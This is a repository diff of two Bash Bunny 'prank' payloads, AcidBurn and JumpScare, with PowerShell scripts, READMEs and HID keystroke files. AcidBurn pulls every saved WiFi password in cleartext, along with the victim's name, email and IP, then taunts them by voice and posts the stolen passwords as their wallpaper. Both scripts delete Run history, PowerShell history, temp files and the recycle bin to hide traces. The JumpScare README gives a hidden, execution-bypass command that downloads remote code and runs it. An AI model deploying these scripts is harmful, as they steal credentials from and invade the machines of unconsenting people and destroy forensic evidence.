############################################################################################################################################################
# Variables
$s=New-Object -ComObject SAPI.SpVoice
############################################################################################################################################################
# Intro ---------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fullName = Get-fullName
# echo statement used to track progress while debugging
echo "Intro Done"
###########################################################################################################
<#
.NOTES
RAM Info
This will get the amount of RAM the target computer has
#>
function Get-RAM {
try {
$OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf("|");$OS = $OS.Substring(0, $OSpos)
$RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1}" -f ($_.sum / 1GB)}
$RAMpos = $RAM.IndexOf('.')
$RAM = [int]$RAM.Substring(0,$RAMpos).Trim()
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$lowRAM = "$RAM gigs of ram? might as well use pen and paper"
$okRAM = "$RAM gigs of ram really? I have a calculator with more computing power"
$goodRAM = "$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?"
$impressiveRAM = "$RAM gigs of ram? are you serious? a super computer with no security that is funny right there"
#----------------------------------------------------------------------------------------------------
if($RAM -le 4){
return $lowRAM
} elseif($RAM -ge 5 -and $RAM -le 12){
return $okRAM
} elseif($RAM -ge 13 -and $RAM -le 24){
return $goodRAM
} else {
return $impressiveRAM
}
}
# If one of the above parameters is not detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "Error in search"
return $null
-ErrorAction SilentlyContinue
}
}
# echo statement used to track progress while debugging
echo "RAM Info Done"
###########################################################################################################
<#
.NOTES
Public IP
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
# If no Public IP is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No Public IP was detected"
return $null
-ErrorAction SilentlyContinue
}
return "your public I P address is $computerPubIP"
}
# echo statement used to track progress while debugging
echo "Pub IP Done"
###########################################################################################################
<#
.NOTES
Wifi Network and Password
This function will custom a tailor response based on how many characters long their password is
#>
function Get-Pass {
#-----VARIABLES-----#
# $pwl = their Pass Word Length
# $pass = their Password
try {
$pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro
$pos = $pro.IndexOf(':')
$pro = $pro.Substring($pos+2).Trim()
$pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass
$passPOS = $pass.IndexOf(':')
$pass = $pass.Substring($passPOS+2).Trim()
if($pro -like '*_5GHz*') {
$pro = $pro.Trimend('_5GHz')
}
$pwl = $pass.length
}
# If no network is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No network was detected"
return $null
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$badPASS = "$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?"
$okPASS = "$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better"
$goodPASS = "$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though."
#----------------------------------------------------------------------------------------------------
if($pass.length -lt 8) { return $badPASS
}elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS
}else { return $goodPASS
}
}
# echo statement used to track progress while debugging
echo "Wifi pass Done"
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
Function Get-Networks {
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
return $WLANProfileObjects
}
}
$Networks = Get-Networks
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
<#
.NOTES
This will take the image you generated and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#############################################################################################################################################
Function WallPaper-Troll {
if (!$Networks) { Write-Host "variable is null"
}else {
# This is the name of the file the networks and passwords are saved
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt"
($Networks| Out-String) >> $Env:temp\$FileName
$content = [IO.File]::ReadAllText("$Env:temp\$FileName")
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:tmp\foo.jpg"
$bmp = new-object System.Drawing.Bitmap $w,$h
$font = new-object System.Drawing.Font Consolas,18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString($content,$font,$brushFg,500,100)
$graphics.Dispose()
$bmp.Save($filename)
# Invoke-Item $filename
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > $Env:temp\foo.txt
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
# This will open up notepad with all their saved networks and passwords and taunt them
$s.Speak("wanna see something really cool?")
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
$s.Speak("Look at all your other passswords I got..")
Start-Sleep -Seconds 1
$s.Speak("These are the wifi passwords for every network you've ever connected to!")
Start-Sleep -Seconds 1
$s.Speak("I could send them to myself but i wont")
}
# echo statement used to track progress while debugging
echo "All Wifi Passes Done"
}
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
#-----VARIABLES-----#
# $pls (password last set) = the date/time their password was last changed
# $days = the number of days since their password was last changed
try {
$pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls
$plsPOS = $pls.IndexOf("e")
$pls = $pls.Substring($plsPOS+2).Trim()
$pls = $pls -replace ".{3}$"
$time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
$DateArray =$time.Split(".")
$days = [int]$DateArray[0]
}
# If no password set date is detected funtion will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting
catch {Write-Error "Day password set not found"
return $null
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$newPass = "$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! "
$avgPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something "
$oldPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! "
#----------------------------------------------------------------------------------------------------
if($days -lt 45) { return $newPass
}elseif($days -gt 44 -and $days -lt 182) { return $avgPASS
}else { return $oldPASS
}
}
# echo statement used to track progress while debugging
echo "Pass last set Done"
###########################################################################################################
<#
.NOTES
Get Email
This function will custom tailor a response based on what type of email the target has
#>
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
$emailpos = $email.IndexOf("@")
$domain = $email.Substring($emailpos+1) #.TrimEnd(".com")
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol"
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$gmailResponse = "At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?"
$yahooResponse = "a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad"
$hotmailResponse = "really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive"
$otherEmailResponse = "I dead ass do not even know what this is.. $email .. hope you did not think it was safe"
#----------------------------------------------------------------------------------------------------
if($email -like '*gmail*') { return $gmailResponse
}elseif($email -like '*yahoo*') { return $yahooResponse
}elseif($email -like '*hotmail*') { return $hotmailResponse
}else { return $otherEmailResponse}
}
# echo statement used to track progress while debugging
echo "Email Done"
###########################################################################################################
<#
.NOTES
Messages
This function will run all the previous functions and assign their outputs to variables
#>
$intro = "$fullName , it has been a long time my friend"
$RAMwarn = Get-RAM
$PUB_IPwarn = Get-PubIP
$PASSwarn = Get-Pass
$LAST_PASSwarn = Get-Days_Set
$EMAILwarn = Get-email
$OUTRO = "My crime is that of curiosity.... and yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName"
# echo statement used to track progress while debugging
echo "Speak Variables set"
###########################################################################################################
# This turns the volume up to max level--------------------------------------------------------------------
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
# echo statement used to track progress while debugging
echo "Volume to max level"
###########################################################################################################
<#
.NOTES
These two snippets are meant to be used as indicators to let you know the script is set up and ready
This will display a pop up window saying "hello $fullname"
Or this makes the CapsLock indicator light blink however many times you set it to
if you do not want the ready notice to pop up or the CapsLock light to blink comment them out below
#>
# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script
# else capslock light will blink as an indicator
$popmessage = "Hello $fullName"
$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)
# caps lock indicator light
$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds 250}
#-----------------------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
echo "it worked"
###########################################################################################################
# this is where your message is spoken line by line
$s=New-Object -ComObject SAPI.SpVoice
# This sets how fast Sapi Speaks
$s.Rate = -1
$s.Speak($intro)
$s.Speak($RAMwarn)
$s.Speak($PUB_IPwarn)
$s.Speak($PASSwarn)
WallPaper-Troll
$s.Speak($LAST_PASSwarn)
$s.Speak($EMAILwarn)
$s.Speak($OUTRO)
###########################################################################################################
# this snippet will leave a message on your targets desktop
$message = "`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back"
Add-Content $home\Desktop\WithLove.txt $message
###########################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}

112
payloads/library/prank/-BB-AcidBurn/README.md Normal file
View File

@ -0,0 +1,112 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Acid Burn
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
If wifi networks and passwords are detected wallpaper will be changed to image displaying that information
Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your bash bunny
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
* Image opened in notepad will reveal a hidden message at the bottom of the binary output
* Script will freeze until a mouse movement is detected
* Sapi Speak will be used to speak out loud the custom responses
* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
* Text file will be left on the target desktop with whatever message you choose
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/BashBunny/Payloads/BB-AcidBurn/hacked-wallpaper.jpg)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Arf
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-AcidBurn)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [PhilSutter](https://github.com/PhilSutter)
<p align="right">(<a href="#top">back to top</a>)</p>

BIN
payloads/library/prank/-BB-AcidBurn/hacked-wallpaper.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

26
payloads/library/prank/-BB-AcidBurn/payload.txt Normal file
View File

@ -0,0 +1,26 @@
# Title: AcidBurn
# Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\AcidBurn.ps1')"
QUACK ENTER

221
payloads/library/prank/-BB-JumpScare/JumpScare.ps1 Normal file
View File

@ -0,0 +1,221 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script can be run as is with the provided execution file
.DESCRIPTION
This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level
Upon running this script it will immediately pause after the downloads until a mouse movement is detected
The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready
After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play
#>
############################################################################################################################################################
# Download Image; replace link to $image to add your own image
$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png"
$i = -join($image,"?dl=1")
iwr $i -O $env:TMP\i.png
iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png
# Download WAV file; replace link to $wav to add your own sound
$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true"
$w = -join($wav,"?dl=1")
iwr $w -O $env:TMP\s.wav
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This will take the image you downloaded and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to play the WAV file
#>
function Play-WAV{
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync()
}
#----------------------------------------------------------------------------------------------------
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
#----------------------------------------------------------------------------------------------------
# Popup message to signal the payload is done
$done = New-Object -ComObject Wscript.Shell;$done.Popup("script is done",1)
Pause-Script
Set-WallPaper -Image "$env:TMP\i.png" -Style Center
Play-WAV
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}

100
payloads/library/prank/-BB-JumpScare/README.md Normal file
View File

@ -0,0 +1,100 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# JumpScare
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This script starts off using Invoke-WebRequests to download both and Image and Sound file
Their system volume is then turned up to the max level
The script will be paused until a mouse movement is detected
At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-JumpScare)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [PhilSutter](https://github.com/PhilSutter)
<p align="right">(<a href="#top">back to top</a>)</p>

BIN
payloads/library/prank/-BB-JumpScare/female_scream.wav Normal file
View File

Binary file not shown.

BIN
payloads/library/prank/-BB-JumpScare/jumpscare.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 934 KiB

26
payloads/library/prank/-BB-JumpScare/payload.txt Normal file
View File

@ -0,0 +1,26 @@
# Title: JumpScare
# Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
